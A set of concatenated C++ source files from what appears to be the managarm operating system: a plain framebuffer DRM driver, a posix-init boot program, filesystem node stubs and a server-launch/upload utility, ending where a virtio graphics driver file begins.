#include <cofiber.hpp>
#include <frigg/atomic.hpp>
#include <frigg/arch_x86/machine.hpp>
#include <frigg/memory.hpp>
#include <helix/ipc.hpp>
#include <helix/await.hpp>
#include <protocols/fs/server.hpp>
#include <protocols/hw/client.hpp>
#include <protocols/mbus/client.hpp>
#include <core/drm/core.hpp>
#include <libdrm/drm.h>
#include <libdrm/drm_mode.h>
#include "plainfb.hpp"
#include <fs.pb.h>
// File-operation table handed to the fs protocol server; all requests on
// a DRM file are forwarded to the generic drm_core implementation.
constexpr auto fileOperations = protocols::fs::FileOperations{}
	.withRead(&drm_core::File::read)
	.withAccessMemory(&drm_core::File::accessMemory)
	.withIoctl(&drm_core::File::ioctl)
	.withPoll(&drm_core::File::poll);
// Serves fs protocol requests on lane `p` for the given DRM device.
// Only DEV_OPEN is supported: it creates a drm_core::File and spawns a
// passthrough server for it on a fresh stream. Loops forever.
COFIBER_ROUTINE(cofiber::no_future, serveDevice(std::shared_ptr<drm_core::Device> device,
		helix::UniqueLane p), ([device = std::move(device), lane = std::move(p)] {
	std::cout << "gfx/plainfb: Connection" << std::endl;

	while(true) {
		// Wait for the next request; the ancillary item carries the
		// per-request conversation lane.
		helix::Accept accept;
		helix::RecvInline recv_req;

		auto &&header = helix::submitAsync(lane, helix::Dispatcher::global(),
				helix::action(&accept, kHelItemAncillary),
				helix::action(&recv_req));
		COFIBER_AWAIT header.async_wait();
		HEL_CHECK(accept.error());
		HEL_CHECK(recv_req.error());

		auto conversation = accept.descriptor();

		managarm::fs::CntRequest req;
		req.ParseFromArray(recv_req.data(), recv_req.length());
		if(req.req_type() == managarm::fs::CntReqType::DEV_OPEN) {
			// Open flags are not supported for this device.
			assert(!req.flags());

			helix::SendBuffer send_resp;
			helix::PushDescriptor push_pt;
			helix::PushDescriptor push_page;

			// Create the file and serve it on its own stream.
			helix::UniqueLane local_lane, remote_lane;
			std::tie(local_lane, remote_lane) = helix::createStream();
			auto file = smarter::make_shared<drm_core::File>(device);
			async::detach(protocols::fs::servePassthrough(
					std::move(local_lane), file, &fileOperations));

			managarm::fs::SvrResponse resp;
			resp.set_error(managarm::fs::Errors::SUCCESS);
			resp.set_caps(managarm::fs::FC_STATUS_PAGE);

			// Reply with the passthrough lane and the status page memory.
			auto ser = resp.SerializeAsString();
			auto &&transmit = helix::submitAsync(conversation, helix::Dispatcher::global(),
					helix::action(&send_resp, ser.data(), ser.size(), kHelItemChain),
					helix::action(&push_pt, remote_lane, kHelItemChain),
					helix::action(&push_page, file->statusPageMemory()));
			COFIBER_AWAIT transmit.async_wait();
			HEL_CHECK(send_resp.error());
			HEL_CHECK(push_pt.error());
			HEL_CHECK(push_page.error());
		}else{
			throw std::runtime_error("Invalid request in serveDevice()");
		}
	}
}))
// ----------------------------------------------------------------
// GfxDevice.
// ----------------------------------------------------------------
// Builds the static DRM mode-setting pipeline for the single scanout:
// one plane, one CRTC, one encoder and one connector, plus the list of
// DMT display modes that fit the firmware-provided screen size.
COFIBER_ROUTINE(cofiber::no_future, GfxDevice::initialize(), ([=] {
	// Setup planes, encoders and CRTCs (i.e. the static entities).
	auto plane = std::make_shared<Plane>(this);
	_theCrtc = std::make_shared<Crtc>(this, plane);
	_theEncoder = std::make_shared<Encoder>(this);

	plane->setupWeakPtr(plane);
	_theCrtc->setupWeakPtr(_theCrtc);
	_theEncoder->setupWeakPtr(_theEncoder);

	// The single encoder can only drive the single CRTC (and clone itself).
	_theEncoder->setupPossibleCrtcs({_theCrtc.get()});
	_theEncoder->setupPossibleClones({_theEncoder.get()});
	_theEncoder->setCurrentCrtc(_theCrtc.get());

	registerObject(plane.get());
	registerObject(_theCrtc.get());
	registerObject(_theEncoder.get());

	setupCrtc(_theCrtc.get());
	setupEncoder(_theEncoder.get());

	// Setup the connector.
	_theConnector = std::make_shared<Connector>(this);
	_theConnector->setupWeakPtr(_theConnector);
	_theConnector->setupPossibleEncoders({_theEncoder.get()});
	_theConnector->setCurrentEncoder(_theEncoder.get());
	_theConnector->setCurrentStatus(1); // 1 = connected (DRM convention).

	registerObject(_theConnector.get());
	attachConnector(_theConnector.get());

	// Advertise all DMT modes that fit the native resolution,
	// sorted largest display area first.
	std::vector<drm_mode_modeinfo> supported_modes;
	drm_core::addDmtModes(supported_modes, _screenWidth, _screenHeight);
	std::sort(supported_modes.begin(), supported_modes.end(),
			[] (const drm_mode_modeinfo &u, const drm_mode_modeinfo &v) {
		return u.hdisplay * u.vdisplay > v.hdisplay * v.vdisplay;
	});
	_theConnector->setModeList(supported_modes);
}))
std::unique_ptr<drm_core::Configuration> GfxDevice::createConfiguration() {
return std::make_unique<Configuration>(this);
}
// Wraps an existing buffer object into a DRM framebuffer.
// `pitch` is the stride in bytes; only 4-byte-per-pixel layouts pass the
// asserts below. NOTE(review): `format` is not inspected here — confirm
// it is validated by the drm_core caller.
std::shared_ptr<drm_core::FrameBuffer> GfxDevice::createFrameBuffer(std::shared_ptr<drm_core::BufferObject> base_bo,
		uint32_t width, uint32_t height, uint32_t format, uint32_t pitch) {
	auto bo = std::static_pointer_cast<GfxDevice::BufferObject>(base_bo);

	// Sanity-check that the BO is large enough for the requested layout.
	assert(pitch % 4 == 0);
	assert(pitch / 4 >= width);
	assert(bo->getSize() >= pitch * height);

	auto fb = std::make_shared<FrameBuffer>(this, bo, pitch);
	fb->setupWeakPtr(fb);
	registerObject(fb.get());
	return fb;
}
// Reports the driver version as a (major, minor, patch) triple.
std::tuple<int, int, int> GfxDevice::driverVersion() {
	return std::make_tuple(0, 0, 1);
}

// Reports the driver name, description and date strings.
std::tuple<std::string, std::string, std::string> GfxDevice::driverInfo() {
	return std::make_tuple(std::string{"plainfb_gpu"},
			std::string{"plainfb gpu"}, std::string{"0"});
}
// Allocates a "dumb" (CPU-rendered) buffer object and returns it together
// with its pitch in bytes. The allocation is rounded up to whole 4 KiB pages.
std::pair<std::shared_ptr<drm_core::BufferObject>, uint32_t>
GfxDevice::createDumb(uint32_t width, uint32_t height, uint32_t bpp) {
	HelHandle handle;
	// Round the byte size up to a multiple of the 4 KiB page size.
	auto size = ((width * height * bpp / 8) + (4096 - 1)) & ~(4096 - 1);
	HEL_CHECK(helAllocateMemory(size, 0, &handle));

	auto bo = std::make_shared<BufferObject>(this, size,
			helix::UniqueDescriptor(handle), width, height);
	// Tightly packed rows: stride equals width in bytes.
	uint32_t pitch = width * bpp / 8;

	auto mapping = installMapping(bo.get());
	bo->setupMapping(mapping);

	return std::make_pair(bo, pitch);
}
// ----------------------------------------------------------------
// GfxDevice::Configuration.
// ----------------------------------------------------------------
// Validates and records the property assignments of an atomic commit into
// _state. Returns false if an unknown property is assigned or if the
// resulting state is inconsistent (e.g. a mode without a framebuffer).
bool GfxDevice::Configuration::capture(std::vector<drm_core::Assignment> assignment) {
	// Lazily create the scanout state the first time a property touches it,
	// seeding it with the CRTC's current mode.
	auto captureScanout = [&] () {
		if(_state)
			return;

		_state.emplace();
		// TODO: Capture FB, width and height.
		_state->mode = _device->_theCrtc->currentMode();
	};

	for(auto &assign : assignment) {
		if(assign.property == _device->srcWProperty()) {
			//TODO: check this outside of capture
			assert(assign.property->validate(assign));

			captureScanout();
			_state->width = assign.intValue;
		}else if(assign.property == _device->srcHProperty()) {
			//TODO: check this outside of capture
			assert(assign.property->validate(assign));

			captureScanout();
			_state->height = assign.intValue;
		}else if(assign.property == _device->fbIdProperty()) {
			//TODO: check this outside of capture
			assert(assign.property->validate(assign));

			auto fb = assign.objectValue->asFrameBuffer();
			captureScanout();
			_state->fb = static_cast<GfxDevice::FrameBuffer *>(fb);
		}else if(assign.property == _device->modeIdProperty()) {
			//TODO: check this outside of capture.
			assert(assign.property->validate(assign));

			captureScanout();
			_state->mode = assign.blobValue;
		}else{
			// Unknown property: reject the whole configuration.
			return false;
		}
	}

	if(_state && _state->mode) {
		// TODO: Consider current width/height if FB did not change.
		// The mode blob overrides any explicitly assigned dimensions.
		drm_mode_modeinfo mode_info;
		memcpy(&mode_info, _state->mode->data(), sizeof(drm_mode_modeinfo));
		_state->height = mode_info.vdisplay;
		_state->width = mode_info.hdisplay;

		// TODO: Check max dimensions: _state->width > 1024 || _state->height > 768
		if(_state->width <= 0 || _state->height <= 0)
			return false;

		// Enabling a mode requires a framebuffer to scan out.
		if(!_state->fb)
			return false;
	}
	return true;
}
// Nothing to roll back: capture() only stores plain values in _state.
void GfxDevice::Configuration::dispose() {

}

// Applies the captured mode to the CRTC and kicks off the asynchronous
// blit performed by _dispatch().
void GfxDevice::Configuration::commit() {
	if(_state)
		_device->_theCrtc->setCurrentMode(_state->mode);

	_dispatch();
}
// Performs the actual scanout update: claims the hw device on first use,
// then blits the framebuffer row by row into the physical framebuffer
// (source pitch and screen pitch may differ). Signals completion at the end.
COFIBER_ROUTINE(cofiber::no_future, GfxDevice::Configuration::_dispatch(), ([=] {
	if(_state && _state->mode) {
//		std::cout << "Swap to framebuffer " << _state[i]->fb->id()
//				<< " " << _state[i]->width << "x" << _state[i]->height << std::endl;

		// Lazily take exclusive ownership of the hardware on first modeset.
		if(!_device->_claimedDevice) {
			COFIBER_AWAIT _device->_hwDevice.claimDevice();
			_device->_claimedDevice = true;
		}

		auto bo = _state->fb->getBufferObject();
		// Only full-screen buffers can be displayed.
		assert(bo->getWidth() == _device->_screenWidth);
		assert(bo->getHeight() == _device->_screenHeight);
		auto dest = reinterpret_cast<char *>(_device->_fbMapping.get());
		auto src = reinterpret_cast<char *>(bo->accessMapping());
		// Copy row by row at 4 bytes per pixel; advance each side by its
		// own pitch since the strides may differ.
		for(unsigned int k = 0; k < bo->getHeight(); k++) {
			memcpy(dest, src, bo->getWidth() * 4);
			dest += _device->_screenPitch;
			src += _state->fb->getPitch();
		}
	}else if(_state) {
		assert(!_state->mode);
		std::cout << "gfx/plainfb: Disable scanout" << std::endl;
	}

	complete();
}))
// ----------------------------------------------------------------
// GfxDevice::Connector.
// ----------------------------------------------------------------
// Allocates a DRM object ID for the connector from the device's allocator.
GfxDevice::Connector::Connector(GfxDevice *device)
	: drm_core::Connector { device->allocator.allocate() } {
//	_encoders.push_back(device->_theEncoder.get());
}
// ----------------------------------------------------------------
// GfxDevice::Encoder.
// ----------------------------------------------------------------
// Allocates a DRM object ID for the encoder from the device's allocator.
GfxDevice::Encoder::Encoder(GfxDevice *device)
	:drm_core::Encoder { device->allocator.allocate() } {
}
// ----------------------------------------------------------------
// GfxDevice::Crtc.
// ----------------------------------------------------------------
// Allocates a DRM object ID for the CRTC and remembers its primary plane.
GfxDevice::Crtc::Crtc(GfxDevice *device, std::shared_ptr<Plane> plane)
	: drm_core::Crtc{device->allocator.allocate()}, _device{device},
		_primaryPlane{std::move(plane)} { }

// The plane that scans out the framebuffer for this CRTC (non-owning view).
drm_core::Plane *GfxDevice::Crtc::primaryPlane() {
	return _primaryPlane.get();
}
// ----------------------------------------------------------------
// GfxDevice::FrameBuffer.
// ----------------------------------------------------------------
// A framebuffer is a view of a buffer object with a fixed pitch.
GfxDevice::FrameBuffer::FrameBuffer(GfxDevice *device,
		std::shared_ptr<GfxDevice::BufferObject> bo, size_t pitch)
: drm_core::FrameBuffer{device->allocator.allocate()},
		_device{device}, _bo{std::move(bo)}, _pitch{pitch} { }

// Stride of one scanline in bytes.
size_t GfxDevice::FrameBuffer::getPitch() {
	return _pitch;
}

// The buffer object whose memory backs this framebuffer (non-owning view).
GfxDevice::BufferObject *GfxDevice::FrameBuffer::getBufferObject() {
	return _bo.get();
}

void GfxDevice::FrameBuffer::notifyDirty() {
	// TODO: Re-blit the FrameBuffer if it is currently displayed.
	std::cout << "gfx/plainfb: notifyDirty() is not implemented correctly" << std::endl;
}
// ----------------------------------------------------------------
// GfxDevice: Plane.
// ----------------------------------------------------------------
// Allocates a DRM object ID for the plane from the device's allocator.
GfxDevice::Plane::Plane(GfxDevice *device)
	: drm_core::Plane{device->allocator.allocate()} { }
// ----------------------------------------------------------------
// GfxDevice: BufferObject.
// ----------------------------------------------------------------
// Maps the buffer memory eagerly; accessMapping() hands out the pointer.
GfxDevice::BufferObject::BufferObject(GfxDevice *device,
		size_t size, helix::UniqueDescriptor memory,
		uint32_t width, uint32_t height)
: _device{device}, _size{size}, _memory{std::move(memory)},
		_width{width}, _height{height} {
	_bufferMapping = helix::Mapping{_memory, 0, getSize()};
}

// Owning shared handle to this BO, required by the drm_core interface.
std::shared_ptr<drm_core::BufferObject> GfxDevice::BufferObject::sharedBufferObject() {
	return this->shared_from_this();
}

// Allocation size in bytes (page-aligned, see createDumb()).
size_t GfxDevice::BufferObject::getSize() {
	return _size;
}

// Width in pixels.
uint32_t GfxDevice::BufferObject::getWidth() {
	return _width;
}

// Height in pixels.
uint32_t GfxDevice::BufferObject::getHeight() {
	return _height;
}

// CPU-accessible pointer to the buffer contents.
void *GfxDevice::BufferObject::accessMapping() {
	return _bufferMapping.get();
}

// Memory handle plus offset (always 0) for mapping by clients.
std::pair<helix::BorrowedDescriptor, uint64_t> GfxDevice::BufferObject::getMemory() {
	return std::make_pair(helix::BorrowedDescriptor(_memory), 0);
}
// ----------------------------------------------------------------
//
// ----------------------------------------------------------------
// Binds to a framebuffer mbus entity, creates a GfxDevice on top of the
// firmware-provided framebuffer, and publishes it as a DRM card on mbus.
COFIBER_ROUTINE(cofiber::no_future, bindController(mbus::Entity entity), ([=] {
	protocols::hw::Device hw_device(COFIBER_AWAIT entity.bind());
	auto info = COFIBER_AWAIT hw_device.getFbInfo();
	auto fb_memory = COFIBER_AWAIT hw_device.accessFbMemory();
	std::cout << "gfx/plainfb: Resolution " << info.width
			<< "x" << info.height << " (" << info.bpp
			<< " bpp, pitch: " << info.pitch << ")" << std::endl;
	// The blit path in _dispatch() assumes 4 bytes per pixel.
	assert(info.bpp == 32);

	auto gfx_device = std::make_shared<GfxDevice>(std::move(hw_device),
			info.width, info.height, info.pitch,
			helix::Mapping{fb_memory, 0, info.pitch * info.height});
	gfx_device->initialize();

	// Create an mbus object for the device.
	auto root = COFIBER_AWAIT mbus::Instance::global().getRoot();

	mbus::Properties descriptor{
		{"unix.subsystem", mbus::StringItem{"drm"}},
		{"unix.devname", mbus::StringItem{"dri/card0"}}
	};

	// Each bind request gets its own stream, served by serveDevice().
	auto handler = mbus::ObjectHandler{}
	.withBind([=] () -> async::result<helix::UniqueDescriptor> {
		helix::UniqueLane local_lane, remote_lane;
		std::tie(local_lane, remote_lane) = helix::createStream();
		serveDevice(gfx_device, std::move(local_lane));

		async::promise<helix::UniqueDescriptor> promise;
		promise.set_value(std::move(remote_lane));
		return promise.async_get();
	});

	COFIBER_AWAIT root.createObject("gfx_plainfb", descriptor, std::move(handler));
}))
// Watches mbus for entities of class "framebuffer" and binds a driver
// instance to each one as it appears.
COFIBER_ROUTINE(cofiber::no_future, observeControllers(), ([] {
	auto root = COFIBER_AWAIT mbus::Instance::global().getRoot();

	auto filter = mbus::Conjunction({
		mbus::EqualsFilter("class", "framebuffer")
	});

	auto handler = mbus::ObserverHandler{}
	.withAttach([] (mbus::Entity entity, mbus::Properties properties) {
		std::cout << "gfx/plainfb: Detected device" << std::endl;
		bindController(std::move(entity));
	});

	COFIBER_AWAIT root.linkObserver(std::move(filter), std::move(handler));
}))
// Entry point: registers the mbus observer, then drives the global
// helix event queue forever.
int main() {
	std::cout << "gfx/plainfb: Starting driver" << std::endl;

	{
		async::queue_scope scope{helix::globalQueue()};
		observeControllers();
	}

	helix::globalQueue()->run();

	return 0;
}
<file_sep>
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#include <iostream>
// PID-1 style init for managarm: redirects stdio to the kernel log,
// starts the essential driver servers, mounts the real root filesystem,
// chroots into it and finally launches udev, the input drivers and weston.
int main() {
	// Route stdout/stderr to the kernel console device.
	int fd = open("/dev/helout", O_WRONLY);
	dup2(fd, STDOUT_FILENO);
	dup2(fd, STDERR_FILENO);

	printf("Starting posix-init\n");

	// Start essential bus and storage drivers.
	auto ehci = fork();
	if(!ehci) {
		execl("/bin/runsvr", "runsvr", "/sbin/ehci", nullptr);
	}else assert(ehci != -1);

	auto virtio = fork();
	if(!virtio) {
		execl("/bin/runsvr", "runsvr", "/sbin/virtio-block", nullptr);
	}else assert(virtio != -1);

/*
	auto block_ata = fork();
	if(!block_ata) {
		execl("/bin/runsvr", "runsvr", "/sbin/block-ata", nullptr);
	}else assert(block_ata != -1);
*/

	auto block_usb = fork();
	if(!block_usb) {
		execl("/bin/runsvr", "runsvr", "/sbin/storage", nullptr);
	}else assert(block_usb != -1);

	// Spin until /dev/sda0 becomes available. Then mount the rootfs and prepare it.
	while(access("/dev/sda0", F_OK)) {
		assert(errno == ENOENT);
		std::cout << "Waiting for /dev/sda0" << std::endl;
		sleep(1);
	}

	// Hack: Start UHCI only after EHCI devices are ready.
	auto uhci = fork();
	if(!uhci) {
		execl("/bin/runsvr", "runsvr", "/sbin/uhci", nullptr);
	}else assert(uhci != -1);

	printf("init: Mounting /dev/sda0\n");
	// Mount the real root and its pseudo filesystems under /realfs.
	if(mount("/dev/sda0", "/realfs", "ext2", 0, ""))
		throw std::runtime_error("mount() failed");
	if(mount("", "/realfs/sys", "sysfs", 0, ""))
		throw std::runtime_error("mount() failed");
	if(mount("", "/realfs/dev", "devtmpfs", 0, ""))
		throw std::runtime_error("mount() failed");
	if(mount("", "/realfs/run", "tmpfs", 0, ""))
		throw std::runtime_error("mount() failed");
	// NOTE(review): the directory is created at /dev/pts but the devpts
	// mount target is /realfs/dev/pts — this presumably works because the
	// same devtmpfs instance is visible at both paths; confirm.
	if(mkdir("/dev/pts", 0620))
		throw std::runtime_error("mkdir() failed");
	if(mount("", "/realfs/dev/pts", "devpts", 0, ""))
		throw std::runtime_error("mount() failed");

	if(chroot("/realfs"))
		throw std::runtime_error("chroot() failed");

	// Some programs, e.g. bash with its builtin getcwd() cannot deal with CWD outside of /.
	if(chdir("/"))
		throw std::runtime_error("chdir() failed");

	std::cout << "init: On /realfs" << std::endl;

	// Uploads a driver binary/library into the kernel's svrctl registry
	// (see the svrctl utility) and waits for the helper to exit.
	auto upload = [] (const char *name) {
		auto svrctl = fork();
		if(!svrctl) {
			execl("/usr/bin/runsvr", "upload", name, nullptr);
		}else assert(svrctl != -1);

		// TODO: Ensure the status is termination.
		waitpid(svrctl, nullptr, 0);
	};

	upload("/usr/bin/gfx_bochs");
	upload("/usr/bin/gfx_plainfb");
	upload("/usr/bin/gfx_virtio");
	upload("/usr/bin/ps2-hid");
	upload("/usr/bin/hid");
	upload("/usr/lib/libevbackend.so");
	upload("/usr/lib/libdrm_core.so");

/*
	auto gfx_virtio = fork();
	if(!gfx_virtio) {
		execl("/usr/bin/runsvr", "runsvr", "/usr/bin/gfx_virtio", nullptr);
	}else assert(gfx_virtio != -1);
*/
/*
	auto gfx_bochs = fork();
	if(!gfx_bochs) {
		execl("/usr/bin/runsvr", "runsvr", "/usr/bin/gfx_bochs", nullptr);
	}else assert(gfx_bochs != -1);
*/
	auto gfx_plainfb = fork();
	if(!gfx_plainfb) {
		execl("/usr/bin/runsvr", "runsvr", "/usr/bin/gfx_plainfb", nullptr);
	}else assert(gfx_plainfb != -1);

	// Wait for the DRM device before starting udev.
	while(access("/dev/dri/card0", F_OK)) {
		assert(errno == ENOENT);
		sleep(1);
	}

/*
	while(access("/dev/input/event0", F_OK)) {
		assert(errno == ENOENT);
		sleep(1);
	}
*/

	auto udev = fork();
	if(!udev) {
		execl("/usr/sbin/udevd", "udevd", nullptr);
		//execl("/usr/sbin/udevd", "udevd", "--debug", nullptr);
	}else assert(udev != -1);

	// Wait until udevd has created its runtime directory.
	while(access("/run/udev/rules.d", F_OK)) { // TODO: Use some other file to wait on?
		assert(errno == ENOENT);
		sleep(1);
	}

	auto input_ps2 = fork();
	if(!input_ps2) {
		execl("/usr/bin/runsvr", "runsvr", "/usr/bin/ps2-hid", nullptr);
	}else assert(input_ps2 != -1);

	auto input_hid = fork();
	if(!input_hid) {
		execl("/usr/bin/runsvr", "runsvr", "/usr/bin/hid", nullptr);
	}else assert(input_hid != -1);

	// Give the input drivers some time to come up before starting weston.
	sleep(3);

/*
	auto udev_trigger_devs = fork();
	if(!udev_trigger_devs) {
		execl("/usr/bin/udevadm", "udevadm", "trigger", "--action=add", nullptr);
	}else assert(udev_trigger_devs != -1);
*/

	auto modeset = fork();
	if(!modeset) {
//		putenv("MLIBC_DEBUG_MALLOC=1");
		putenv("PATH=/usr/local/bin:/usr/bin:/bin");
		putenv("XDG_RUNTIME_DIR=/run");
		putenv("MESA_GLSL_CACHE_DISABLE=1");
//		putenv("MESA_DEBUG=1");
//		putenv("TGSI_PRINT_SANITY=1");
//		putenv("SOFTPIPE_NO_RAST=1");
//		putenv("SOFTPIPE_DUMP_FS=1");
		//execve("/root/unixsock", args.data(), env.data());
		//execve("/root/test-libudev", args.data(), env.data());
//		execl("/usr/bin/kmscube", "kmscube", nullptr);
		//execve("/root/modeset-render", args.data(), env.data());
		//execve("/root/modeset-double-buffered", args.data(), env.data());
		//execl("/usr/bin/weston", "weston", "--use-pixman", nullptr);
		execl("/usr/bin/weston", "weston", nullptr);
	}else assert(modeset != -1);

	// init never exits; idle forever.
	while(true)
		sleep(60);
}
<file_sep>
#include <string.h>
#include <future>
#include <cofiber.hpp>
#include <cofiber/future.hpp>
#include "common.hpp"
#include "fs.hpp"
// --------------------------------------------------------
// FsNode implementation.
// --------------------------------------------------------
// Default implementations for the FsNode interface: every operation
// throws unless a concrete filesystem overrides it.

VfsType FsNode::getType() {
	throw std::runtime_error("getType() is not implemented for this FsNode");
}

FutureMaybe<FileStats> FsNode::getStats() {
	throw std::runtime_error("getStats() is not implemented for this FsNode");
}

std::shared_ptr<FsLink> FsNode::treeLink() {
	throw std::runtime_error("treeLink() is not implemented for this FsNode");
}

FutureMaybe<std::shared_ptr<FsLink>> FsNode::getLink(std::string) {
	throw std::runtime_error("getLink() is not implemented for this FsNode");
}

FutureMaybe<std::shared_ptr<FsLink>> FsNode::link(std::string, std::shared_ptr<FsNode>) {
	throw std::runtime_error("link() is not implemented for this FsNode");
}

FutureMaybe<std::shared_ptr<FsLink>> FsNode::mkdir(std::string) {
	throw std::runtime_error("mkdir() is not implemented for this FsNode");
}

FutureMaybe<std::shared_ptr<FsLink>> FsNode::symlink(std::string, std::string) {
	throw std::runtime_error("symlink() is not implemented for this FsNode");
}

FutureMaybe<std::shared_ptr<FsLink>> FsNode::mkdev(std::string, VfsType, DeviceId) {
	throw std::runtime_error("mkdev() is not implemented for this FsNode");
}

FutureMaybe<void> FsNode::unlink(std::string) {
	throw std::runtime_error("unlink() is not implemented for this FsNode");
}

FutureMaybe<smarter::shared_ptr<File, FileHandle>>
FsNode::open(std::shared_ptr<FsLink>, SemanticFlags) {
	throw std::runtime_error("open() is not implemented for this FsNode");
}

// Unlike the other stubs, readSymlink() reports failure through the
// result object (illegalOperationTarget) instead of throwing.
expected<std::string> FsNode::readSymlink(FsLink *link) {
	async::promise<std::variant<Error, std::string>> p;
	p.set_value(Error::illegalOperationTarget);
	return p.async_get();
}

DeviceId FsNode::readDevice() {
	throw std::runtime_error("readDevice() is not implemented for this FsNode");
}
<file_sep>
#include <fcntl.h>
#include <sys/stat.h>
#include <iostream>
#include <async/jump.hpp>
#include <helix/memory.hpp>
#include <protocols/mbus/client.hpp>
#include <svrctl.pb.h>
// ----------------------------------------------------------------------------
// svrctl handling.
// ----------------------------------------------------------------------------
// Lane to the kernel's svrctl object; filled in by enumerateSvrctl().
helix::UniqueLane svrctlLane;
// Fires once the svrctl mbus object has been discovered.
async::jump foundSvrctl;
// Discovers the kernel's svrctl mbus object and stores a lane to it in
// svrctlLane. Completes only after the object has been found.
COFIBER_ROUTINE(async::result<void>, enumerateSvrctl(), ([] {
	auto root = COFIBER_AWAIT mbus::Instance::global().getRoot();

	auto filter = mbus::Conjunction({
		mbus::EqualsFilter("class", "svrctl")
	});

	auto handler = mbus::ObserverHandler{}
	.withAttach([] (mbus::Entity entity, mbus::Properties properties) {
//		std::cout << "runsvr: Found svrctl" << std::endl;
		svrctlLane = helix::UniqueLane(COFIBER_AWAIT entity.bind());
		foundSvrctl.trigger();
	});
	COFIBER_AWAIT root.linkObserver(std::move(filter), std::move(handler));

	// Block until the attach callback above has run.
	COFIBER_AWAIT foundSvrctl.async_wait();
	COFIBER_RETURN();
}))
// Asks the svrctl server to launch the server binary at `name`.
// Asserts that the request succeeds.
COFIBER_ROUTINE(async::result<void>, runServer(const char *name), ([=] {
	helix::Offer offer;
	helix::SendBuffer send_req;
	helix::RecvInline recv_resp;

	managarm::svrctl::CntRequest req;
	req.set_req_type(managarm::svrctl::CntReqType::SVR_RUN);
	req.set_name(name);

	auto ser = req.SerializeAsString();
	auto &&transmit = helix::submitAsync(svrctlLane, helix::Dispatcher::global(),
			helix::action(&offer, kHelItemAncillary),
			helix::action(&send_req, ser.data(), ser.size(), kHelItemChain),
			helix::action(&recv_resp));
	COFIBER_AWAIT transmit.async_wait();
	HEL_CHECK(offer.error());
	HEL_CHECK(send_req.error());
	HEL_CHECK(recv_resp.error());

	managarm::svrctl::SvrResponse resp;
	resp.ParseFromArray(recv_resp.data(), recv_resp.length());
	assert(resp.error() == managarm::svrctl::Error::SUCCESS);
	COFIBER_RETURN();
}))
// Reads the file at `name` into memory and uploads it to the kernel's
// svrctl object via a FILE_UPLOAD request. Throws std::runtime_error on
// local I/O failures; asserts that the server reports success.
COFIBER_ROUTINE(async::result<void>, uploadFile(const char *name), ([=] {
	// First, load the whole file into a buffer.
	// TODO: stat() + read() introduces a TOCTTOU race.
	struct stat st;
	if(stat(name, &st))
		throw std::runtime_error("Could not stat file");

	auto fd = open(name, O_RDONLY);
	// Fix: open() failure was previously unchecked.
	if(fd < 0)
		throw std::runtime_error("Could not open file");

	auto buffer = malloc(st.st_size);
	if(!buffer)
		throw std::runtime_error("Could not allocate buffer for file");

	off_t progress = 0;
	while(progress < st.st_size) {
		// Fix: append each chunk after the data already read. The previous
		// code always read into the start of the buffer, corrupting any
		// file that was not consumed by a single read() call.
		auto chunk = read(fd, static_cast<char *>(buffer) + progress,
				st.st_size - progress);
		if(chunk <= 0)
			throw std::runtime_error("Error while reading file");
		progress += chunk;
	}
	close(fd);

	// Now, send the file to the kernel.
	helix::Offer offer;
	helix::SendBuffer send_req;
	helix::SendBuffer send_data;
	helix::RecvInline recv_resp;

	managarm::svrctl::CntRequest req;
	req.set_req_type(managarm::svrctl::CntReqType::FILE_UPLOAD);
	req.set_name(name);

	auto ser = req.SerializeAsString();
	auto &&transmit = helix::submitAsync(svrctlLane, helix::Dispatcher::global(),
			helix::action(&offer, kHelItemAncillary),
			helix::action(&send_req, ser.data(), ser.size(), kHelItemChain),
			helix::action(&send_data, buffer, progress, kHelItemChain),
			helix::action(&recv_resp));
	COFIBER_AWAIT transmit.async_wait();
	HEL_CHECK(offer.error());
	HEL_CHECK(send_req.error());
	HEL_CHECK(send_data.error()); // Fix: this result was previously unchecked.
	HEL_CHECK(recv_resp.error());
	free(buffer);

	managarm::svrctl::SvrResponse resp;
	resp.ParseFromArray(recv_resp.data(), recv_resp.length());
	assert(resp.error() == managarm::svrctl::Error::SUCCESS);
	COFIBER_RETURN();
}))
// ----------------------------------------------------------------
// Freestanding mbus functions.
// ----------------------------------------------------------------
// Dispatches on argv[0] (the utility is installed under multiple names):
// invoked as "runsvr <path>" it starts a server; invoked as
// "upload <path>" it uploads a file blob. Exits the process on success.
COFIBER_ROUTINE(cofiber::no_future, asyncMain(const char **args), ([=] {
	COFIBER_AWAIT enumerateSvrctl();

	if(!strcmp(args[0], "runsvr")) {
		if(!args[1])
			throw std::runtime_error("Expected at least one argument");

		std::cout << "svrctl: Running " << args[1] << std::endl;
		COFIBER_AWAIT runServer(args[1]);
		exit(0);
	}else if(!strcmp(args[0], "upload")) {
		if(!args[1])
			throw std::runtime_error("Expected at least one argument");

		std::cout << "svrctl: Uploading " << args[1] << std::endl;
		COFIBER_AWAIT uploadFile(args[1]);
		exit(0);
	}else{
		throw std::runtime_error("Unexpected command for svrctl utility");
	}
}))
// Entry point: kicks off asyncMain() and processes the global helix
// queue until one of the async paths calls exit().
int main(int argc, const char **argv) {
	{
		async::queue_scope scope{helix::globalQueue()};
		asyncMain(argv);
	}

	helix::globalQueue()->run();

	return 0;
}
<file_sep>
#include <assert.h>
#include <stdio.h>
#include <deque>
#include <experimental/optional>
#include <functional>
#include <iostream>
#include <memory>
#include <numeric>
#include <arch/bits.hpp>
#include <arch/register.hpp>
#include <arch/io_space.hpp>
#include <async/result.hpp>
#include <boost/intrusive/list.hpp>
#include <cofiber.hpp>
#include <frigg/atomic.hpp>
#include <frigg/arch_x86/machine.hpp>
#include <frigg/memory.hpp>
#include <helix/ipc.hpp>
#include <helix/await.hpp>
#include <protocols/fs/server.hpp>
#include <protocols/hw/client.hpp>
#include <protocols/mbus/client.hpp>
#include <core/drm/core.hpp>
#include <libdrm/drm.h>
#include <libdrm/drm_mode.h>
#include "virtio.hpp"
#include <fs.pb.h>
// File-operation table handed to the fs protocol server; all requests on
// a DRM file are forwarded to the generic drm_core implementation.
constexpr auto fileOperations = protocols::fs::FileOperations{}
	.withRead(&drm_core::File::read)
	.withAccessMemory(&drm_core::File::accessMemory)
	.withIoctl(&drm_core::File::ioctl)
	.withPoll(&drm_core::File::poll);
// Serves fs protocol requests on lane `p` for the given DRM device.
// Only DEV_OPEN is supported: it creates a drm_core::File and spawns a
// passthrough server for it on a fresh stream. Loops forever.
